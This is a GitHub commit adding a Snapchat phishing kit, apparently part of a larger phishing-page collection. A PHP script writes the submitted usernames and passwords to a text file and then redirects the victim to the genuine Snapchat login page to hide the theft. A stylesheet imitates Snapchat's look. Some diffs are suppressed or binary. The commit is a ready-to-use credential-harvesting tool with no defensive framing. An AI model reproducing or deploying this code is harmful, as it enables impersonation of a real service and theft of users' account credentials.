snapchat_added

This commit is contained in:
Usama Abdul Sattar 2018-04-22 10:47:43 +05:00 committed by GitHub
parent 0d9ff71b18
commit 346b64b1cc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 390 additions and 0 deletions

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,14 @@
<?php
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location:https://accounts.snapchat.com');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
}
exit();
?>

Binary file not shown.

Binary file not shown.

Binary file not shown.

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,69 @@
.snapchatFontThin {
font-family: 'HelveticaNeue-Thin', 'HelveticaNeue-Light', 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif;
}
a {
cursor: pointer;
}
#navigationMenu {
text-align: center;
padding: 1rem;
}
#navigationMenu .button {
width: 75%;
max-width: 240px;
}
#navigationMenuButton {
float: right;
}
#navigationMenuButton img {
width: 20px;
}
.ui.snapchatHeader.stackable.grid .column {
margin-top: 2rem !important;
margin-bottom: 1rem;
padding-top: 1rem !important;
padding-bottom: 1rem;
}
.snapchatHeader .logo {
width: 80px;
}
.snapchatInvertedHeader h1 {
text-align: center;
}
.snapchatInvertedHeader h1 .logo {
padding-top: .5rem;
width: 36px;
}
.snapchatBody.stackable.grid {
padding-bottom: 5rem !important;
}
.snapchatFooter.stackable.grid {
padding-top: 3rem;
padding-bottom: 4rem;
border-top: 1px solid #EEE;
}
.snapchatFooter.stackable.grid h5 {
text-transform: uppercase;
}
.snapchatFooter .column {
text-align: center;
}
@font-face {
font-family: 'Dropdown';
src: url("fonts/icons.woff");
format('truetype'), url("fonts/icons.woff");
format('woff');
font-weight: normal;
font-style: normal;
}